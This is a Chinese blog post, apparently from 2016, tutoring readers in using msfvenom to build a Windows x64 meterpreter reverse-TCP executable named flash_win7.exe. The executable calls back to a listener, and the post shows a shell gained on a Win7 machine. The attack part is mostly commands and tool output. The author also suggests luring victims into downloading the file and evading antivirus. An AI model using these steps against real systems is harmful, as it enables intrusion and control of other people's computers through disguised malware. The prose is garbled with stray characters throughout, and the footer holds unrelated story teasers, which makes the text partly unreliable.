msfvenom

因?yàn)楸荣愋枰詫W(xué)了一下msfvenom摆碉,可能會斷斷續(xù)續(xù)或者不完整,僅作參考脓豪。


在kali2.0的環(huán)境上巷帝,因?yàn)閙sfpayload沒有了,被整合進(jìn)了msfvenom扫夜,所以這就只寫一些關(guān)于msfvenom的東西楞泼。
這里就只是記錄下生成一個程序的過程。

msfvenom

msfvenom是msfpayload,msfencode的結(jié)合體笤闯,可利用msfvenom生成木馬程序,并在目標(biāo)機(jī)上執(zhí)行,在本地監(jiān)聽上線

0x00

首先還是得打開postgresql
root@kali:~# service postgresql start

然后讓我們看看它有哪些功能

root@kali:~# msfvenom 
Error: No options
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>

Options:
    -p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
        --payload-options            List the payload's standard options
    -l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
    -n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
    -f, --format        <format>     Output format (use --help-formats for a list)
        --help-formats               List available formats
    -e, --encoder       <encoder>    The encoder to use
    -a, --arch          <arch>       The architecture to use
        --platform      <platform>   The platform of the payload
        --help-platforms             List available platforms
    -s, --space         <length>     The maximum size of the resulting payload
        --encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
    -b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
    -i, --iterations    <count>      The number of times to encode the payload
    -c, --add-code      <path>       Specify an additional win32 shellcode file to include
    -x, --template      <path>       Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --out           <path>       Save the payload
    -v, --var-name      <name>       Specify a custom variable name to use for certain output formats
        --smallest                   Generate the smallest possible payload
    -h, --help                       Show this message

部分參數(shù)
-p 選擇一個載荷堕阔,或者說一個模塊吧。
-l 載荷列表
-f 生成的文件格式
-e 編碼方式
-i 編碼次數(shù)
-b 在生成的程序中避免出現(xiàn)的值
-h 幫助

說到文件格式颗味,不同的平臺需要的不同超陆,來看看支持生成的格式

root@kali:~# msfvenom --help-formats
Error: Executable formats
    asp, aspx, aspx-exe, dll, elf, elf-so, 
exe, exe-only, exe-service, exe-small, hta-psh, 
loop-vbs, macho, msi, msi-nouac, osx-app, psh, 
psh-net, psh-reflection, psh-cmd, vba, vba-exe, vba-psh, vbs, war
Transform formats
    bash, c, csharp, dw, dword, hex, java, js_be, js_le, 
num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscript

0x01

讓我們正式開始吧,因?yàn)槲业哪繕?biāo)平臺是一個win7 64 位浦马,所以要找一個相應(yīng)的載荷时呀。

root@kali:~# msfvenom -l | grep windows | grep x64 | grep tcp
    windows/x64/meterpreter/bind_ipv6_tcp               Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for an IPv6 connection (Windows x64)
    windows/x64/meterpreter/bind_ipv6_tcp_uuid          Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for an IPv6 connection with UUID Support (Windows x64)
    windows/x64/meterpreter/bind_tcp                    Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a connection (Windows x64)
    windows/x64/meterpreter/bind_tcp_uuid               Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Listen for a connection with UUID Support (Windows x64)
    windows/x64/meterpreter/reverse_tcp                 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker (Windows x64)
    windows/x64/meterpreter/reverse_tcp_uuid            Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker with UUID Support (Windows x64)
    windows/x64/meterpreter_bind_tcp                    Connect to victim and spawn a Meterpreter shell
    windows/x64/meterpreter_reverse_ipv6_tcp            Connect back to attacker and spawn a Meterpreter shell
    windows/x64/meterpreter_reverse_tcp                 Connect back to attacker and spawn a Meterpreter shell
    windows/x64/powershell_bind_tcp                     Listen for a connection and spawn an interactive powershell session
    windows/x64/powershell_reverse_tcp                  Listen for a connection and spawn an interactive powershell session
    windows/x64/shell/bind_ipv6_tcp                     Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)
    windows/x64/shell/bind_ipv6_tcp_uuid                Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)
    windows/x64/shell/bind_tcp                          Spawn a piped command shell (Windows x64) (staged). Listen for a connection (Windows x64)
    windows/x64/shell/bind_tcp_uuid                     Spawn a piped command shell (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)
    windows/x64/shell/reverse_tcp                       Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker (Windows x64)
    windows/x64/shell/reverse_tcp_uuid                  Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)
    windows/x64/shell_bind_tcp                          Listen for a connection and spawn a command shell (Windows x64)
    windows/x64/shell_reverse_tcp                       Connect back to attacker and spawn a command shell (Windows x64)
    windows/x64/vncinject/bind_ipv6_tcp                 Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)
    windows/x64/vncinject/bind_ipv6_tcp_uuid            Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)
    windows/x64/vncinject/bind_tcp                      Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection (Windows x64)
    windows/x64/vncinject/bind_tcp_uuid                 Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)
    windows/x64/vncinject/reverse_tcp                   Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker (Windows x64)
    windows/x64/vncinject/reverse_tcp_uuid              Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)

生成程序(默認(rèn)路徑是在home下)

root@kali:~# msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.80.142 lport=443 -f exe X > flash_win7.exe 
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1188911 bytes
生成的程序

至于怎么弄到對方機(jī)器上去就不贅述了,你可以直接發(fā)晶默,也可以誘騙下載谨娜,也可以放進(jìn)圖片里...
當(dāng)然,記得做免殺磺陡。

我為了簡單就直接通過網(wǎng)頁了

網(wǎng)頁代碼

通過msfconsole開始監(jiān)聽


監(jiān)聽

當(dāng)目標(biāo)運(yùn)行程序的時候趴梢,便能獲得shell


成功獲取shell

在C盤創(chuàng)建一個文件夾 取名為 ‘1’

05.jpg

刪除它


06.jpg

可以看到我們能在根目錄下作修改,說明權(quán)限還是比較高的币他。想做什么就自由發(fā)揮了坞靶。

0x02

打完收工,吃飯去了圆丹。
關(guān)機(jī)


07.jpg

也可看下大神的教程
http://www.i0day.com/1173.html


2016年5月6日

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末滩愁,一起剝皮案震驚了整個濱河市,隨后出現(xiàn)的幾起案子辫封,更是在濱河造成了極大的恐慌硝枉,老刑警劉巖,帶你破解...
    沈念sama閱讀 206,723評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件倦微,死亡現(xiàn)場離奇詭異妻味,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī)欣福,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,485評論 2 382
  • 文/潘曉璐 我一進(jìn)店門责球,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事雏逾〖慰悖” “怎么了?”我有些...
    開封第一講書人閱讀 152,998評論 0 344
  • 文/不壞的土叔 我叫張陵栖博,是天一觀的道長屑宠。 經(jīng)常有香客問我,道長仇让,這世上最難降的妖魔是什么典奉? 我笑而不...
    開封第一講書人閱讀 55,323評論 1 279
  • 正文 為了忘掉前任,我火速辦了婚禮丧叽,結(jié)果婚禮上卫玖,老公的妹妹穿的比我還像新娘。我一直安慰自己踊淳,他們只是感情好假瞬,可當(dāng)我...
    茶點(diǎn)故事閱讀 64,355評論 5 374
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著嚣崭,像睡著了一般笨触。 火紅的嫁衣襯著肌膚如雪懦傍。 梳的紋絲不亂的頭發(fā)上雹舀,一...
    開封第一講書人閱讀 49,079評論 1 285
  • 那天,我揣著相機(jī)與錄音粗俱,去河邊找鬼说榆。 笑死,一個胖子當(dāng)著我的面吹牛寸认,可吹牛的內(nèi)容都是我干的签财。 我是一名探鬼主播,決...
    沈念sama閱讀 38,389評論 3 400
  • 文/蒼蘭香墨 我猛地睜開眼偏塞,長吁一口氣:“原來是場噩夢啊……” “哼唱蒸!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起灸叼,我...
    開封第一講書人閱讀 37,019評論 0 259
  • 序言:老撾萬榮一對情侶失蹤神汹,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后古今,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體屁魏,經(jīng)...
    沈念sama閱讀 43,519評論 1 300
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 35,971評論 2 325
  • 正文 我和宋清朗相戀三年捉腥,在試婚紗的時候發(fā)現(xiàn)自己被綠了氓拼。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 38,100評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖桃漾,靈堂內(nèi)的尸體忽然破棺而出坏匪,到底是詐尸還是另有隱情,我是刑警寧澤撬统,帶...
    沈念sama閱讀 33,738評論 4 324
  • 正文 年R本政府宣布剥槐,位于F島的核電站,受9級特大地震影響宪摧,放射性物質(zhì)發(fā)生泄漏粒竖。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,293評論 3 307
  • 文/蒙蒙 一几于、第九天 我趴在偏房一處隱蔽的房頂上張望蕊苗。 院中可真熱鬧,春花似錦沿彭、人聲如沸朽砰。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,289評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽瞧柔。三九已至,卻和暖如春睦裳,著一層夾襖步出監(jiān)牢的瞬間造锅,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,517評論 1 262
  • 我被黑心中介騙來泰國打工廉邑, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留哥蔚,地道東北人。 一個月前我還...
    沈念sama閱讀 45,547評論 2 354
  • 正文 我出身青樓蛛蒙,卻偏偏與公主長得像糙箍,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子牵祟,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 42,834評論 2 345

推薦閱讀更多精彩內(nèi)容